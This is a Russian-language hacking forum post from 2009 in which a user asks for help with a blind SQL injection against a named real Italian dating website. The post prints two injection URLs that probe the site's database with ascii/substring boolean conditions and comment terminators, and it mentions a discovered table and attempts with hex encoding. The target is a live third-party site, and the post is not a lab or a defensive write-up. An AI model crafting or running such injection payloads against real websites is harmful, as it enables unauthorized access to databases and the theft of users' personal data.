30.09.2009, 19:49
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
С нами:
9055208
Репутация:
5
|
|
Сообщение от Ctacok
Это к примеру как выглядит твой запрос поначалу.
Конечно столбцы могут называться по другому, я тебе просто привёл пример.
А вобще юзай поиск, или же читай тему про SQL Инъекцию.
Была бы простая инъекция-непопросил бы помоши.Твое предложение к сожелению неподойдет 
Узнал что есть таблица acces.
Когда делаю запрос _http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb%27+and+if(ascii(subst ring((select+column_name+from+acces),1,1))%3E=1,1, 0)--+
Ошибка.Пробовал перекодировать в хекс,все равно,но по ошибка и если попробовать _http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb%27+and+if(ascii(subst ring((select+column_name+from++CHARACTER_SETS),1,1 ))%3E=1,1,0)--+
Прошу сильно не пинать-с блиндом только учусь работать( и с POST инъекциями  )
Последний раз редактировалось 2Fed123; 30.09.2009 в 20:02..
|
|
|